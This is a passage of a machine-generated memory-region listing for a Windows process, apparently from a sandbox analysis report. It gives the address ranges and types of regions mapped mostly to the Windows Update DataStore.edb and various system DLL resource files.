region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 478
start_va = 0x1c9a470000
end_va = 0x1c9a47ffff
entry_point = 0x1c9a470000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 479
start_va = 0x1c9a480000
end_va = 0x1c9a48ffff
entry_point = 0x1c9a480000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 480
start_va = 0x1c9a490000
end_va = 0x1c9a49ffff
entry_point = 0x1c9a490000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 481
start_va = 0x1c9a4a0000
end_va = 0x1c9a4affff
entry_point = 0x1c9a4a0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 482
start_va = 0x1c9a4b0000
end_va = 0x1c9a4bffff
entry_point = 0x1c9a4b0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 483
start_va = 0x1c9a4c0000
end_va = 0x1c9a4cffff
entry_point = 0x1c9a4c0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 484
start_va = 0x1c9a4d0000
end_va = 0x1c9a4dffff
entry_point = 0x1c9a4d0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 485
start_va = 0x1c9a4e0000
end_va = 0x1c9a4effff
entry_point = 0x1c9a4e0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 486
start_va = 0x1c9a4f0000
end_va = 0x1c9a4fffff
entry_point = 0x1c9a4f0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 487
start_va = 0x1c9a500000
end_va = 0x1c9a50ffff
entry_point = 0x1c9a500000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 488
start_va = 0x1c9a510000
end_va = 0x1c9a51ffff
entry_point = 0x1c9a510000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 489
start_va = 0x1c9a520000
end_va = 0x1c9a52ffff
entry_point = 0x1c9a520000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 490
start_va = 0x1c9a530000
end_va = 0x1c9a5affff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9a530000"
filename = ""
Region:
id = 491
start_va = 0x1c9a5b0000
end_va = 0x1c9a5bffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9a5b0000"
filename = ""
Region:
id = 492
start_va = 0x1c9a5c0000
end_va = 0x1c9a5cffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9a5c0000"
filename = ""
Region:
id = 493
start_va = 0x1c9a5e0000
end_va = 0x1c9a5e0fff
entry_point = 0x1c9a5e0000
region_type = mapped_file
name = "usocore.dll.mui"
filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui")
Region:
id = 494
start_va = 0x1c9a5f0000
end_va = 0x1c9a5fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9a5f0000"
filename = ""
Region:
id = 495
start_va = 0x1c9a600000
end_va = 0x1c9a60ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9a600000"
filename = ""
Region:
id = 496
start_va = 0x1c9a610000
end_va = 0x1c9a61ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9a610000"
filename = ""
Region:
id = 497
start_va = 0x1c9a620000
end_va = 0x1c9a627fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9a620000"
filename = ""
Region:
id = 498
start_va = 0x1c9a630000
end_va = 0x1c9a63ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9a630000"
filename = ""
Region:
id = 499
start_va = 0x1c9a640000
end_va = 0x1c9a640fff
entry_point = 0x1c9a640000
region_type = mapped_file
name = "msxml6r.dll"
filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll")
Region:
id = 500
start_va = 0x1c9a650000
end_va = 0x1c9a653fff
entry_point = 0x1c9a650000
region_type = mapped_file
name = "wuaueng.dll.mui"
filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui")
Region:
id = 501
start_va = 0x1c9a660000
end_va = 0x1c9a661fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c9a660000"
filename = ""
Region:
id = 502
start_va = 0x1c9a670000
end_va = 0x1c9a67ffff
entry_point = 0x1c9a670000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 503
start_va = 0x1c9a680000
end_va = 0x1c9a68ffff
entry_point = 0x1c9a680000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 504
start_va = 0x1c9a690000
end_va = 0x1c9a69ffff
entry_point = 0x1c9a690000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 505
start_va = 0x1c9a6a0000
end_va = 0x1c9a6affff
entry_point = 0x1c9a6a0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 506
start_va = 0x1c9a6b0000
end_va = 0x1c9a6bffff
entry_point = 0x1c9a6b0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 507
start_va = 0x1c9a6c0000
end_va = 0x1c9a6cffff
entry_point = 0x1c9a6c0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 508
start_va = 0x1c9a6d0000
end_va = 0x1c9a6dffff
entry_point = 0x1c9a6d0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 509
start_va = 0x1c9a6e0000
end_va = 0x1c9a6effff
entry_point = 0x1c9a6e0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 510
start_va = 0x1c9a6f0000
end_va = 0x1c9a6f6fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9a6f0000"
filename = ""
Region:
id = 511
start_va = 0x1c9a700000
end_va = 0x1c9a7fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9a700000"
filename = ""
Region:
id = 512
start_va = 0x1c9a800000
end_va = 0x1c9a8fffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9a800000"
filename = ""
Region:
id = 513
start_va = 0x1c9a900000
end_va = 0x1c9a90ffff
entry_point = 0x1c9a900000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 514
start_va = 0x1c9a910000
end_va = 0x1c9a91ffff
entry_point = 0x1c9a910000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 515
start_va = 0x1c9a920000
end_va = 0x1c9a92ffff
entry_point = 0x1c9a920000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 516
start_va = 0x1c9a930000
end_va = 0x1c9a93ffff
entry_point = 0x1c9a930000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 517
start_va = 0x1c9a940000
end_va = 0x1c9a94ffff
entry_point = 0x1c9a940000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 518
start_va = 0x1c9a950000
end_va = 0x1c9a95ffff
entry_point = 0x1c9a950000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 519
start_va = 0x1c9a960000
end_va = 0x1c9a96ffff
entry_point = 0x1c9a960000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 520
start_va = 0x1c9a970000
end_va = 0x1c9a97ffff
entry_point = 0x1c9a970000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 521
start_va = 0x1c9a980000
end_va = 0x1c9a98ffff
entry_point = 0x1c9a980000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 522
start_va = 0x1c9a990000
end_va = 0x1c9a99ffff
entry_point = 0x1c9a990000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 523
start_va = 0x1c9a9a0000
end_va = 0x1c9a9affff
entry_point = 0x1c9a9a0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 524
start_va = 0x1c9a9b0000
end_va = 0x1c9a9bffff
entry_point = 0x1c9a9b0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 525
start_va = 0x1c9a9c0000
end_va = 0x1c9a9cffff
entry_point = 0x1c9a9c0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 526
start_va = 0x1c9a9d0000
end_va = 0x1c9a9dffff
entry_point = 0x1c9a9d0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 527
start_va = 0x1c9a9e0000
end_va = 0x1c9a9effff
entry_point = 0x1c9a9e0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 528
start_va = 0x1c9a9f0000
end_va = 0x1c9a9fffff
entry_point = 0x1c9a9f0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 529
start_va = 0x1c9aa00000
end_va = 0x1c9aa0ffff
entry_point = 0x1c9aa00000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 530
start_va = 0x1c9aa10000
end_va = 0x1c9aa1ffff
entry_point = 0x1c9aa10000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 531
start_va = 0x1c9aa20000
end_va = 0x1c9aa2ffff
entry_point = 0x1c9aa20000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 532
start_va = 0x1c9aa30000
end_va = 0x1c9aa3ffff
entry_point = 0x1c9aa30000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 533
start_va = 0x1c9aa40000
end_va = 0x1c9aa4ffff
entry_point = 0x1c9aa40000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 534
start_va = 0x1c9aa50000
end_va = 0x1c9aa5ffff
entry_point = 0x1c9aa50000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 535
start_va = 0x1c9aa60000
end_va = 0x1c9aa6ffff
entry_point = 0x1c9aa60000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 536
start_va = 0x1c9aa70000
end_va = 0x1c9aa7ffff
entry_point = 0x1c9aa70000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 537
start_va = 0x1c9aa80000
end_va = 0x1c9aa8ffff
entry_point = 0x1c9aa80000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 538
start_va = 0x1c9aa90000
end_va = 0x1c9aa9ffff
entry_point = 0x1c9aa90000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 539
start_va = 0x1c9aaa0000
end_va = 0x1c9aaaffff
entry_point = 0x1c9aaa0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 540
start_va = 0x1c9aab0000
end_va = 0x1c9aabffff
entry_point = 0x1c9aab0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 541
start_va = 0x1c9aac0000
end_va = 0x1c9aacffff
entry_point = 0x1c9aac0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 542
start_va = 0x1c9aad0000
end_va = 0x1c9aadffff
entry_point = 0x1c9aad0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 543
start_va = 0x1c9aae0000
end_va = 0x1c9aaeffff
entry_point = 0x1c9aae0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 544
start_va = 0x1c9aaf0000
end_va = 0x1c9aafffff
entry_point = 0x1c9aaf0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 545
start_va = 0x1c9ab00000
end_va = 0x1c9ab0ffff
entry_point = 0x1c9ab00000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 546
start_va = 0x1c9ab10000
end_va = 0x1c9ab1ffff
entry_point = 0x1c9ab10000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 547
start_va = 0x1c9ab20000
end_va = 0x1c9ab2ffff
entry_point = 0x1c9ab20000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 548
start_va = 0x1c9ab30000
end_va = 0x1c9ab3ffff
entry_point = 0x1c9ab30000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 549
start_va = 0x1c9ab40000
end_va = 0x1c9ab4ffff
entry_point = 0x1c9ab40000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 550
start_va = 0x1c9ab50000
end_va = 0x1c9ab5ffff
entry_point = 0x1c9ab50000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 551
start_va = 0x1c9ab60000
end_va = 0x1c9ab6ffff
entry_point = 0x1c9ab60000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 552
start_va = 0x1c9ab70000
end_va = 0x1c9ab7ffff
entry_point = 0x1c9ab70000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 553
start_va = 0x1c9ab80000
end_va = 0x1c9ab8ffff
entry_point = 0x1c9ab80000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 554
start_va = 0x1c9ab90000
end_va = 0x1c9ab9ffff
entry_point = 0x1c9ab90000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 555
start_va = 0x1c9aba0000
end_va = 0x1c9abaffff
entry_point = 0x1c9aba0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 556
start_va = 0x1c9abb0000
end_va = 0x1c9abbffff
entry_point = 0x1c9abb0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 557
start_va = 0x1c9abc0000
end_va = 0x1c9abcffff
entry_point = 0x1c9abc0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 558
start_va = 0x1c9abd0000
end_va = 0x1c9abdffff
entry_point = 0x1c9abd0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 559
start_va = 0x1c9abe0000
end_va = 0x1c9abeffff
entry_point = 0x1c9abe0000
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 560
start_va = 0x1c9abf0000
end_va = 0x1c9abf4fff
entry_point = 0x1c9abf0000
region_type = mapped_file
name = "winnlsres.dll"
filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll")
Region:
id = 561
start_va = 0x1c9ac00000
end_va = 0x1c9ac0ffff
entry_point = 0x1c9ac00000
region_type = mapped_file
name = "winnlsres.dll.mui"
filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui")
Region:
id = 562
start_va = 0x1c9ac10000
end_va = 0x1c9ac12fff
entry_point = 0x1c9ac10000
region_type = mapped_file
name = "mswsock.dll.mui"
filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui")
Region:
id = 563
start_va = 0x1c9ac40000
end_va = 0x1c9ac41fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c9ac40000"
filename = ""
Region:
id = 564
start_va = 0x1c9ac50000
end_va = 0x1c9ac59fff
entry_point = 0x1c9ac50000
region_type = mapped_file
name = "crypt32.dll.mui"
filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui")
Region:
id = 565
start_va = 0x1c9ac60000
end_va = 0x1c9ac6efff
entry_point = 0x1c9ac60000
region_type = mapped_file
name = "qmgr.dll.mui"
filename = "\\Windows\\System32\\en-US\\qmgr.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\qmgr.dll.mui")
Region:
id = 566
start_va = 0x1c9ac70000
end_va = 0x1c9ac73fff
entry_point = 0x1c9ac70000
region_type = mapped_file
name = "winhttp.dll.mui"
filename = "\\Windows\\System32\\en-US\\winhttp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winhttp.dll.mui")
Region:
id = 567
start_va = 0x1c9ad00000
end_va = 0x1c9adfffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9ad00000"
filename = ""
Region:
id = 568
start_va = 0x1c9ae00000
end_va = 0x1c9aefffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9ae00000"
filename = ""
Region:
id = 569
start_va = 0x1c9af00000
end_va = 0x1c9affffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c9af00000"
filename = ""
Region:
id = 570
start_va = 0x7df5ff0a0000
end_va = 0x7ff5ff09ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ff0a0000"
filename = ""
Region:
id = 571
start_va = 0x7ff6c6de8000
end_va = 0x7ff6c6de9fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6de8000"
filename = ""
Region:
id = 572
start_va = 0x7ff6c6dea000
end_va = 0x7ff6c6debfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dea000"
filename = ""
Region:
id = 573
start_va = 0x7ff6c6dec000
end_va = 0x7ff6c6dedfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dec000"
filename = ""
Region:
id = 574
start_va = 0x7ff6c6dee000
end_va = 0x7ff6c6deffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dee000"
filename = ""
Region:
id = 575
start_va = 0x7ff6c6df0000
end_va = 0x7ff6c6df1fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6df0000"
filename = ""
Region:
id = 576
start_va = 0x7ff6c6df2000
end_va = 0x7ff6c6df3fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6df2000"
filename = ""
Region:
id = 577
start_va = 0x7ff6c6df4000
end_va = 0x7ff6c6df5fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6df4000"
filename = ""
Region:
id = 578
start_va = 0x7ff6c6df6000
end_va = 0x7ff6c6df7fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6df6000"
filename = ""
Region:
id = 579
start_va = 0x7ff6c6df8000
end_va = 0x7ff6c6df9fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6df8000"
filename = ""
Region:
id = 580
start_va = 0x7ff6c6dfa000
end_va = 0x7ff6c6dfbfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dfa000"
filename = ""
Region:
id = 581
start_va = 0x7ff6c6dfc000
end_va = 0x7ff6c6dfdfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dfc000"
filename = ""
Region:
id = 582
start_va = 0x7ff6c6dfe000
end_va = 0x7ff6c6dfffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6dfe000"
filename = ""
Region:
id = 583
start_va = 0x7ff6c6e00000
end_va = 0x7ff6c6e01fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e00000"
filename = ""
Region:
id = 584
start_va = 0x7ff6c6e02000
end_va = 0x7ff6c6e03fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e02000"
filename = ""
Region:
id = 585
start_va = 0x7ff6c6e04000
end_va = 0x7ff6c6e05fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e04000"
filename = ""
Region:
id = 586
start_va = 0x7ff6c6e06000
end_va = 0x7ff6c6e07fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e06000"
filename = ""
Region:
id = 587
start_va = 0x7ff6c6e08000
end_va = 0x7ff6c6e09fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e08000"
filename = ""
Region:
id = 588
start_va = 0x7ff6c6e0a000
end_va = 0x7ff6c6e0bfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e0a000"
filename = ""
Region:
id = 589
start_va = 0x7ff6c6e0c000
end_va = 0x7ff6c6e0dfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e0c000"
filename = ""
Region:
id = 590
start_va = 0x7ff6c6e0e000
end_va = 0x7ff6c6e0ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e0e000"
filename = ""
Region:
id = 591
start_va = 0x7ff6c6e10000
end_va = 0x7ff6c6e11fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e10000"
filename = ""
Region:
id = 592
start_va = 0x7ff6c6e12000
end_va = 0x7ff6c6e13fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e12000"
filename = ""
Region:
id = 593
start_va = 0x7ff6c6e14000
end_va = 0x7ff6c6e15fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e14000"
filename = ""
Region:
id = 594
start_va = 0x7ff6c6e16000
end_va = 0x7ff6c6e17fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e16000"
filename = ""
Region:
id = 595
start_va = 0x7ff6c6e18000
end_va = 0x7ff6c6e19fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e18000"
filename = ""
Region:
id = 596
start_va = 0x7ff6c6e1a000
end_va = 0x7ff6c6e1bfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6e1a000"
filename = ""
Region:
id = 597
